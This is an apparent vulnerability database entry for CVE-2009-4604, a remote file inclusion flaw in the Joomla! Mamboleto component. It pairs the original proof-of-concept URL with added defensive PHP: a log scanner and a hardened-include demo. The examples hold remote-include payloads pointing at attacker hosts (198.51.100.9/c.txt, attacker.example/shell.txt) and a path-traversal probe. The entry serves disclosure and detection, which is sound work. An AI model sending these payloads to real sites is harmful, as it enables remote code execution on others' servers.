Joomla! Mamboleto Component 'mamboleto.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1118753    Type: Code injection (remote file inclusion)
Published: 2009-12-10    Updated: 2010-01-13
CVE: CVE-2009-4604    CNNVD ID: CNNVD-201001-075
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/10369
https://cxsecurity.com/issue/WLB-2010010166
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-075
|Vulnerability Details
A PHP remote file inclusion vulnerability exists in mamboleto.php in the Fernando Soares Mamboleto (com_mamboleto) component 2.0 RC3 for Joomla!. A remote attacker can execute arbitrary PHP code by supplying a URL in the mosConfig_absolute_path parameter. The script never initialises $mosConfig_absolute_path itself; it expects the CMS to have defined that Joomla! 1.0-era global, so the attack requires PHP's register_globals to be enabled (so that the query-string parameter becomes the global) and remote stream includes to be permitted (allow_url_include, or allow_url_fopen on PHP before 5.2). Both settings were still common on Joomla! 1.5 hosts running components in "legacy mode".
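Because Joomla! never sends a mosConfig_absolute_path parameter itself, any request carrying it to mamboleto.php is a probe for this vulnerability. The following PHP script is an added example, not part of the advisory or the CNNVD entry: it scans Apache combined-format access lines for such requests and separates remote-include attempts (a stream-wrapper scheme such as http://, ftp://, php:// or data:// in the value) from local path probes. The log lines are constructed; 198.51.100.9 and c.txt are assumed attacker-side values. It needs PHP 7.1 or newer.

```php
<?php
// Added example, not from the advisory or the CNNVD entry: scan Apache
// combined-format access logs for requests that try to set the
// mosConfig_absolute_path parameter on mamboleto.php. Joomla! itself never
// sends that parameter, so any occurrence is worth an alert; a value that
// starts with a stream-wrapper scheme (http://, ftp://, php://, data://, ...)
// is a remote-include attempt in the sense of CVE-2009-4604.
// Requires PHP 7.1+. The log lines below are constructed sample data;
// 198.51.100.9 and c.txt are assumed attacker-side values.

$accessLog = <<<'LOG'
203.0.113.7 - - [10/Dec/2009:12:00:01 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=http://198.51.100.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2009:12:00:02 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=ftp%3A%2F%2F198.51.100.9%2Fc.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Dec/2009:12:00:03 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Dec/2009:12:00:04 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=../../../../etc HTTP/1.1" 200 512 "-" "curl/7.19"
LOG;

// Returns null for a benign line, otherwise the fields an analyst needs.
function classify_request(string $line): ?array
{
    // client ip, timestamp, method, request-target
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
        return null; // not a combined-format line
    }
    list(, $ip, $time, $method, $target) = $m;

    $path  = parse_url($target, PHP_URL_PATH);
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($path) || !is_string($query)) {
        return null;
    }
    if (basename($path) !== 'mamboleto.php') {
        return null;
    }
    parse_str($query, $params); // percent-decodes the values for us
    if (!isset($params['mosConfig_absolute_path'])) {
        return null;
    }
    $value  = (string) $params['mosConfig_absolute_path'];
    $remote = (bool) preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value);

    return [
        'ip'     => $ip,
        'time'   => $time,
        'method' => $method,
        'value'  => $value,
        // remote = stream-wrapper include (RFI); local = traversal / LFI probe
        'kind'   => $remote ? 'remote' : 'local',
    ];
}

function scan_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $hit = classify_request($line);
        if ($hit !== null) {
            $hits[] = $hit;
        }
    }
    return $hits;
}

foreach (scan_log($accessLog) as $hit) {
    printf("%s %s %s include of %s\n", $hit['time'], $hit['ip'], $hit['kind'], $hit['value']);
}
```

On the sample data the first two lines are reported as remote (the second after parse_str has percent-decoded it), the index.php line is ignored, and the traversal line is reported as local. Matching on the decoded parameter rather than on a raw substring such as "http://" is deliberate: the PoC in this advisory is just as dangerous when the scheme is percent-encoded or delivered through a wrapper other than http.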
|Exploit
/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulnerability
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://www.indonesiancoder.com
[!] Date	: December 10, 2009
[!] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] New Mamboleto 2.0 RC3 for Joomla! 1.5.x in "legacy mode".
    Much improved, with two more banks (Sicredi and Bancoob) and a new integration module for VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://server/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]
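The include on line 123 is only exploitable because $mosConfig_absolute_path is never assigned in mamboleto.php: with register_globals=On, PHP creates a global of that name from the query string before the script runs, and with allow_url_include=On the resulting URL is fetched and executed. The PHP below is an added example, not code from the Mamboleto component or from the advisory author: it reproduces that mechanism for a constructed request and sets a hardened include beside it. The attacker URL (attacker.example/shell.txt) and the site root /var/www/site are assumed values.

```php
<?php
// Added example, not code from the Mamboleto component: it reproduces the
// mechanism behind the advisory's line 123 and shows the hardened form.
// mamboleto.php never assigns $mosConfig_absolute_path; it relies on Joomla!
// (the 1.0 configuration.php global, emulated by 1.5 "legacy mode") having
// set it. With register_globals=On, PHP pre-populates a global of that name
// from the query string, so a direct request controls the include path; with
// allow_url_include=On (allow_url_fopen on PHP < 5.2) the include fetches
// the URL. The attacker URL and site root below are assumed values.

// Emulates register_globals for a constructed request.
function register_globals(array $get): array
{
    $globals = [];
    foreach ($get as $name => $value) {
        $globals[$name] = $value;
    }
    return $globals;
}

// Vulnerable: the same string the component builds and passes to include_once().
function vulnerable_include_target(array $globals): string
{
    $mosConfig_absolute_path = $globals['mosConfig_absolute_path'] ?? '';
    return $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php';
}

// Hardened: (1) refuse direct access unless Joomla! bootstrapped the request
// (index.php defines _JEXEC before loading any component); (2) derive the
// site root from the file's own location, never from a global; (3) only
// include a regular file that actually sits below that root.
function hardened_include_target(bool $jexecDefined, string $componentDir): string
{
    if (!$jexecDefined) {
        throw new RuntimeException('Restricted access');
    }
    $siteRoot = dirname(dirname($componentDir)); // <root>/components/com_mamboleto -> <root>
    $target   = $siteRoot . '/administrator/components/com_mamboleto/include/pre.php';
    $real     = realpath($target);
    if ($real === false || !is_file($real)
        || strpos($real, realpath($siteRoot) . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('pre.php missing or outside the site root');
    }
    return $real;
}

// Request mirroring the PoC (constructed). The trailing '?' turns the
// component's appended '/administrator/...' into a query string on the
// attacker's server, so the fetched script is exactly what the attacker hosts.
$g = register_globals(['mosConfig_absolute_path' => 'http://attacker.example/shell.txt?']);
echo "vulnerable target: " . vulnerable_include_target($g) . PHP_EOL;

try {
    hardened_include_target(false, '/var/www/site/components/com_mamboleto');
} catch (RuntimeException $e) {
    echo "hardened, direct request: " . $e->getMessage() . PHP_EOL;
}
```

In a real Joomla! 1.5 component the first check is the usual one-liner `defined('_JEXEC') or die('Restricted access');` at the top of the file, which on its own stops the PoC because the script is being requested directly. The path check matters as well, since a component file that is reachable through the CMS can still be handed a poisoned global by another legacy script. On the server side, register_globals=Off and allow_url_include=Off remove the preconditions for this whole class of mosConfig_absolute_path bugs, not just this one.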

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ] 

[>] FOR MALINGSIAL


[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : watch out, there's a workman =))
[+] arianom says : Collect coins for Prita Mulyasari !!!
[+] Pathloader says : Okay then, if th... th... th... that's how it is :D
[+] tiw0L says : Don't eat it pleaseeeeee!!!
|References

XF: mamboleto-mamboleto-file-include (54662), http://xforce.iss.net/xforce/xfdb/54662
BID: 37280, http://www.securityfocus.com/bid/37280
MISC: http://www.exploit-db.com/exploits/10369
MISC: http://packetstormsecurity.org/0912-exploits/joomlamamboleto-rfi.txt